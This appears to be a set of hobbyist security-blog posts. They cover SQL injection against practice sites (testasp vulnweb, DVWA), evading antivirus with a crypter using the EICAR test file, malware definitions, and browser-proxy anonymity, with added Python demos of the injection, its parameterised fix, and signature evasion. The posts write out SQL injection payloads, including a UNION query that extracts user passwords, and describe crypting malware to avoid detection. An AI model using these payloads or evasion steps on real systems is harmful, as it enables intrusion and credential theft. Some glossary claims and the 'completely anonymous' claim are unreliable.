Error-based SQL injection on Vulnweb.com

Following my past work, today I breached vulnweb.com's security using error-based SQL injection. I chose 'testasp.com/showforum.asp?id=2' as my prey. First I checked the website's exception handling by putting a single quote after the 1 in the URL (?id=1'). The server responded with an error stating that the server being used is MYSQL. This made me think a little, and I came to the conclusion of using error-based injection on this site.

To get the table names, and then the column names from a table, I used SQL itself: the convert() function is used to produce an error, and the table name appears in that error. Calling convert() in the following request produced the error:

?id=1' and 1=convert(int,(select top 1 table_name from information_schema.tables)) #

Following the same approach I learnt the column names, and then the login information, namely usernames and passwords.

The red line in the screenshot shows that the error produced by the convert() call contains the name of the first table in the information schema. I found the users table in the same way, and the user details by the same method.

Union-based SQL injection on dvwa

This whole week I worked on the different ways to attack a website to get to its database. I did this using SQL injection. I have known about SQL injection for a long time now, but I never had an opportunity to use it on a live website (as using it on a website you do not own is illegal). But I found some websites which allow users to test their skills. I performed the injections on my favourite, 'dvwa'.

The first attack I performed was on the low security level of dvwa, and it is very easy to find out that the web app is vulnerable: by just putting a single quote (') in the input field and hitting the submit button, I found out that the app runs on a MYSQL server, and then I decided my further steps to penetrate the app.

I first found out the number of columns present in the database. I did this using 'order by'; luckily it took me just three tries to find the exact number of columns, which is 3. Next I found out the database name and the version of the database. The version was above 5.6.1, so I could use the usual 'union based injection' on this web app.
Using the union command of SQL and a single quote I found the names of the tables and columns in the database, and then I got access to the table where the usernames and passwords were stored.
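The following is an added worked example, not code from the original posts or from vulnweb/dvwa, that reproduces the mechanics of both posts on a local database: the quote probe whose raw error discloses the engine (the error-based post), the 'order by' column count and the union query that pulls rows from a users table (the union-based post), and the parameterised version that treats the same input as plain data. It uses SQLite because it ships with Python; note that convert(int, ...) and 'top 1' as used in the first post are SQL Server (T-SQL) constructs, and SQLite has no equivalent cast error, so the error-based part here shows the syntax-error disclosure rather than a cast error. The table and column names are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the forum and users tables the posts talk about
    (hypothetical names, not the real vulnweb or dvwa schema)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE forum(id INTEGER, title TEXT, body TEXT);
        INSERT INTO forum VALUES (1, 'Welcome', 'first post'), (2, 'Rules', 'be nice');
        CREATE TABLE users(user_id INTEGER, user TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'md5-placeholder-hash');
    """)
    return con


def showforum_vulnerable(con, id_param):
    """Builds the query by string concatenation and echoes the raw engine error:
    the two defects that make error-based and union-based injection possible."""
    sql = "SELECT id, title, body FROM forum WHERE id = '" + id_param + "'"
    try:
        return con.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # Returning the engine's own message to the client is the information leak
        # the first post relies on (engine name, syntax details, later table names).
        return "DB ERROR: " + str(exc)


def showforum_fixed(con, id_param):
    """Parameterised query: the value is bound as data and never parsed as SQL.
    Errors go to the server log; the client only gets a generic message."""
    try:
        return con.execute(
            "SELECT id, title, body FROM forum WHERE id = ?", (id_param,)
        ).fetchall()
    except sqlite3.Error:
        return "Request failed"  # real code would log the exception with a request id


def probe_column_count(con, max_cols=10):
    """The 'order by' step from the dvwa post, against the vulnerable endpoint:
    the first n for which ORDER BY n fails is one more than the column count."""
    for n in range(1, max_cols + 1):
        result = showforum_vulnerable(con, "1' ORDER BY %d --" % n)
        if isinstance(result, str):  # an error came back
            return n - 1
    return None


if __name__ == "__main__":
    con = make_db()
    print(showforum_vulnerable(con, "1'"))            # raw engine error leaks
    print(probe_column_count(con))                     # 3, as in the post
    union = "1' UNION SELECT user_id, user, password FROM users --"
    print(showforum_vulnerable(con, union))            # users rows appended
    print(showforum_fixed(con, union))                 # [] : payload is just a value
```

The fix is the parameterised query, not input filtering: with the bound parameter the union payload is compared against the id column as a literal string and simply matches nothing, and the quote probe produces no error at all.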

Crypters and Antivirus Software

I discussed the different kinds of malware in my last post. In this post I am going to show a demo of how to use crypters, and how easily popular antivirus products can be bypassed using a crypter. For a formal introduction, let us start with crypters and FUD.


Crypter

A crypter is a tool used for encryption. I usually use crypters for encoding viruses, keyloggers or any RAT tool, to make them undetectable by antivirus software so that they are not deleted by it. Thus a crypter is a program that allows me to encrypt the source code of my virus or program. From what I have read, antivirus software works by splitting the source code of an application and then searching for certain strings within it. If the antivirus detects any malicious strings, it either stops the scan or deletes the file from the system as a virus. Thus a crypter basically makes an infected file FUD (Fully Undetectable) or UD (Undetectable) by encrypting it.


In this post I am going to show how I used an easily available crypter to encode a virus, and how I was easily able to bypass many popular antivirus products.

Download a Virus

Here I am going to download a file containing 'x86 machine language' code, which is a legitimate DOS program and produces sensible results when run (it prints the message 'EICAR-STANDARD-ANTIVIRUS-TEST-FILE!'). This code can be downloaded from EICAR's website


OR

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Copy the above code, paste it into a Notepad file and save the file with an .exe extension.

Scan the downloaded file

Now I am going to test the .exe file for the presence of a virus on online virus-scanner websites; a few of them are mentioned below.


Encrypt the file

I used a crypter to encrypt the file; this software can be downloaded easily. I used 'CRYPTER MINI'.

Then I browsed to the file, clicked on the 'Make your File Sick!' button, waited for a while and saved the file.

Scan the Encrypted file

Now I scanned the file again on 'https://www.virustotal.com', and this time the results are different.

This shows that many popular antivirus products are easily bypassed using a simple crypter. That is how I fool these antivirus programs.
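As an added illustration of the Crypter section above (example code written for this page, not from the post or from CRYPTER MINI), the block below shows why a scanner that only looks for a fixed byte pattern stops matching once the file is re-encoded, and what a scanner has to do instead: try to undo the encodings it knows and scan the result. The "crypter" here is a deliberately trivial single-byte XOR, labelled as a constructed stand-in; the EICAR string is the same public test string quoted above, so nothing scanned here is harmful.

```python
# The EICAR test string from the post: harmless by design, detected by every scanner.
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

# Toy signature database: fixed byte patterns, i.e. the string matching the post describes.
SIGNATURES = {"EICAR-Test-File": b"EICAR-STANDARD-ANTIVIRUS-TEST-FILE!"}


def signature_scan(data):
    """Plain string-signature scan: names of every pattern found verbatim in data."""
    return [name for name, pattern in SIGNATURES.items() if pattern in data]


def toy_crypt(data, key):
    """Constructed stand-in for the crypter's encoding step: single-byte XOR.
    Real crypters differ, but the effect is the same: the bytes the signature
    was written for are no longer present in the file as stored on disk."""
    return bytes(b ^ key for b in data)


def layered_scan(data):
    """What a scanner must do instead of matching only the stored bytes: scan the
    sample as-is, then undo each simple encoding it knows (here: every single-byte
    XOR key) and scan again. Returns (signature name, key) pairs; key 0 means the
    sample matched without any decoding."""
    hits = []
    for key in range(256):
        for name in signature_scan(toy_crypt(data, key)):
            hits.append((name, key))
    return hits


if __name__ == "__main__":
    crypted = toy_crypt(EICAR, 0x5A)
    print(signature_scan(EICAR))      # ['EICAR-Test-File']
    print(signature_scan(crypted))    # []  : the fixed pattern is gone
    print(layered_scan(crypted))      # [('EICAR-Test-File', 90)]
```

This is the whole story behind the differing VirusTotal results: a product that matches stored bytes misses the re-encoded file, while one that unpacks or emulates the file before matching (or that flags the unpacking stub itself) still catches it. Brute-forcing one XOR byte is only the toy version of that unpacking step.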

Malware

Malware

As Wikipedia states, "malware" is an umbrella term used for intrusive software; it includes many other terms which each need a little briefing. The terms under this umbrella are:
  • Virus
  • Worms
  • Trojans
  • Ransom Wares
  • Botnet
  • Rootkits.
These are all very confusing terms, so today I am going to give differentiating definitions for all of the above.


Virus

A computer virus is code which, when present in a computer system, brings instability to the system. A true virus cannot replicate itself from one computer system to another without human assistance. It is inactive until it is executed, and the system shows no sign of its presence, but as soon as it is executed it starts infecting the system. The most common function of a computer virus is to replicate copies of itself. Some advanced viruses even modify themselves during replication. The major impact of these is the consumption of processor time and space on the hard disk.


Worms

Worms are an advancement on the 'virus' category: once executed they can transmit or transfer themselves over a network, i.e. they have the capability of travelling through networks. They can be stopped only if a firewall is implemented between the networks or a good antivirus is present on the system. The basic procedure followed by firewalls and antivirus software to block worms is to block the ports through which they travel. Also, a worm does not require a host program to travel or perform its (programmed) function.


Trojans

Trojans are commonly known as Trojan horses. Generally a Trojan horse is a non-replicating type of malware. The term is derived from the Ancient Greek story of the wooden horse that was used to help Greek troops invade the city of Troy by stealth. Trojans are generally used for remote access, to steal or corrupt data. A very important point to note is that a static IP is used to get remote access to the infected system. There are two kinds of Trojans:
  1. Direct Trojan
  2. Reverse Trojan

These are also known as RATs (Remote Access Tools), as they are used to gain remote access to the infected system.


Ransomware

As the name suggests, 'ransomware' is a type of malware that stops you from using your PC. It holds your PC or files for ransom. Often the ransomware will claim you have done something illegal with your PC, and that you are being fined by a police force or government agency. These claims are false. It is a scare tactic designed to make you pay the money without telling anyone who might be able to restore your PC. There is no guarantee that paying the fine or doing what the ransomware tells you will give you access to your PC or files again.


Bot/Botnets

These are compromised machines which are used for DDoS (Distributed Denial of Service) purposes. The victims of this attack have no clue that they are part of a serious attack going on against a particular website. These bots are instructed to form a network, and this network of bots is known as a botnet. Botnets are also known as zombie armies, and thus a bot is known as a zombie. The largest known botnet is 'ZEUS'.


Rootkit

A rootkit is a type of software designed to hide the fact that an operating system has been compromised. These kinds of malware are used to encrypt other kinds of malware. Rootkits are used to encapsulate the virus code until it reaches its destination, hence protecting it from detection as a shield on the code. Rootkits allow viruses and malware to "hide in plain sight" by disguising themselves as necessary files that your antivirus software will overlook.

Implementing anonymity

What should be the first thing one does after learning about anonymity? Of course, to be anonymous. I believe that 'plugin based proxy servers' are (if not the best) one of the best ways to implement anonymity. I did the same using anonymoX (a Chrome plugin). Now follow these steps:

STEP 1:

First I added the plugin to my Chrome browser, by just searching 'anonymox for chrome' on Google.

STEP 2:

Then I clicked on the first link I saw, which was the official anonymoX page on the Chrome app store.


I clicked on the "Add to Chrome" dialog box at the top right.

STEP 3:

To change my identity online, I click on the icon (a capital X) in the top right corner. Now I saw:

[Screenshot: the anonymoX panel]

I then turned on anonymoX, chose from the available options and clicked on the "Change Identity" option.

STEP 4:

I can check my new online identity on websites like
  • ipcow.com 
  • ipchicken.com
  • whatsmyip.org 
  • or just Google "my ip"
I used Googling "my ip", as it is the fastest among the available options. And now I am completely anonymous online.

[Screenshot: my old IP address online]

[Screenshot: my new IP address online]